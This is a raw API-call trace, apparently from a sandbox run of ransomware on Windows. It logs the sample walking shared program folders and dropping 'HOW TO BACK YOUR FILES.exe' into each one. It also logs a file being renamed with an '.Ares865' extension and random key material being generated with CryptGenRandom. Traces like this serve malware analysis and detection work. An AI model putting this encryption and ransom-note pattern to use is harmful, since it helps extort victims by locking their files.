returned="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\1033" [0074.972] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0074.972] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\1033\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\1033\\how to back your files.exe"), bFailIfExists=1) returned 1 [0074.982] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0074.982] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\1033\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x617be070, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5e31c380, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5e31c380, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0074.982] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0074.982] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0074.982] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared" [0074.982] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1708 | out: hHeap=0x2b0000) returned 1 [0074.982] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2460 | out: hHeap=0x2b0000) returned 1 [0074.982] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared") returned 59 [0074.982] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared" [0074.982] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0074.982] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\how to back your files.exe"), bFailIfExists=1) returned 1 [0074.986] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0074.986] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81afcd40, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x5e31c380, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5e31c380, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0074.986] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0074.986] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0074.987] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts" [0074.987] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9eb0 | out: hHeap=0x2b0000) returned 1 [0074.987] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2460 | out: hHeap=0x2b0000) returned 1 [0074.987] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts") returned 65 [0074.987] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts" [0074.987] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0074.987] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\fonts\\how to back your files.exe"), bFailIfExists=1) returned 1 [0075.003] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0075.003] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81afcd40, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x5e368640, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5e368640, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0075.003] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0075.003] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0075.003] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\ICAD.FMP.Ares865") returned 82 [0075.003] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\ICAD.FMP" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\fonts\\icad.fmp"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\ICAD.FMP.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\fonts\\icad.fmp.ares865"), dwFlags=0x1) returned 1 [0075.004] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\ICAD.FMP.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\fonts\\icad.fmp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0075.004] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=326) returned 1 [0075.004] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f02f8) returned 1 [0075.005] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0075.005] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0075.013] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f02f8) returned 1 [0075.014] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0075.014] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0075.015] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\VGX", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\VGX") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\VGX" [0075.015] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e49b0 | out: hHeap=0x2b0000) returned 1 [0075.015] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2440 | out: hHeap=0x2b0000) returned 1 [0075.015] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VGX") returned 50 [0075.015] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\VGX" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\VGX") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\VGX" [0075.015] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0075.015] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VGX\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\vgx\\how to back your files.exe"), bFailIfExists=1) returned 1 [0075.019] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0075.019] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VGX\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x5e38e7a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5e38e7a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0075.019] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0075.019] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0075.019] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\VC", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\VC") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\VC" [0075.019] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4940 | out: hHeap=0x2b0000) returned 1 [0075.019] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2420 | out: hHeap=0x2b0000) returned 1 [0075.019] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VC") returned 49 [0075.019] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\VC" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\VC") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\VC" [0075.019] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0075.019] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\vc\\how to back your files.exe"), bFailIfExists=1) returned 1 [0075.033] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0075.033] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd2c6940, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0x5e38e7a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5e38e7a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0075.033] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0075.033] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0075.033] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA" [0075.033] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e48d0 | out: hHeap=0x2b0000) returned 1 [0075.033] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2400 | out: hHeap=0x2b0000) returned 1 [0075.033] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA") returned 50 [0075.033] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA" [0075.033] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0075.033] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\how to back your files.exe"), bFailIfExists=1) returned 1 [0075.039] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0075.039] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5e3b4900, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5e3b4900, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0075.040] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0075.040] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0075.040] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7" [0075.040] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3418 | out: hHeap=0x2b0000) returned 1 [0075.040] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2400 | out: hHeap=0x2b0000) returned 1 [0075.040] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7") returned 55 [0075.040] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7" [0075.040] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0075.040] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\how to back your files.exe"), bFailIfExists=1) returned 1 [0075.044] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0075.044] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5e3b4900, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5e3b4900, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0075.044] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0075.044] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0075.044] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033" [0075.044] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0075.044] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2400 | out: hHeap=0x2b0000) returned 1 [0075.045] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033") returned 60 [0075.045] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033" [0075.045] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0075.045] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\how to back your files.exe"), bFailIfExists=1) returned 1 [0075.053] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0075.053] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5e3daa60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5e3daa60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0075.053] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0075.053] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0075.054] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\Triedit", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\Triedit") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\Triedit" [0075.054] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d33a0 | out: hHeap=0x2b0000) returned 1 [0075.054] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23e0 | out: hHeap=0x2b0000) returned 1 [0075.054] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Triedit") returned 54 [0075.054] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\Triedit" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\Triedit") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\Triedit" [0075.054] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0075.054] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Triedit\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\triedit\\how to back your files.exe"), bFailIfExists=1) returned 1 [0075.059] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0075.059] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Triedit\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x5e3daa60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5e3daa60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0075.059] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0075.059] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0075.059] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\Triedit\\en-US", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\Triedit\\en-US") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\Triedit\\en-US" [0075.059] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0075.059] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23e0 | out: hHeap=0x2b0000) returned 1 [0075.060] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Triedit\\en-US") returned 60 [0075.060] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\Triedit\\en-US" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\Triedit\\en-US") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\Triedit\\en-US" [0075.060] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0075.060] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Triedit\\en-US\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\triedit\\en-us\\how to back your files.exe"), bFailIfExists=1) returned 1 [0075.064] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0075.064] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Triedit\\en-US\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x5e3daa60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5e3daa60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0075.065] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0075.065] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0075.065] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT" [0075.065] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3328 | out: hHeap=0x2b0000) returned 1 [0075.065] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23a0 | out: hHeap=0x2b0000) returned 1 [0075.065] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT") returned 55 [0075.065] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT" [0075.065] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0075.065] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\how to back your files.exe"), bFailIfExists=1) returned 1 [0075.071] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0075.071] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54a7f50, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5e400bc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5e400bc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0075.071] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0075.071] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0075.071] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN" [0075.071] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0408 | out: hHeap=0x2b0000) returned 1 [0075.071] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2460 | out: hHeap=0x2b0000) returned 1 [0075.071] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN") returned 60 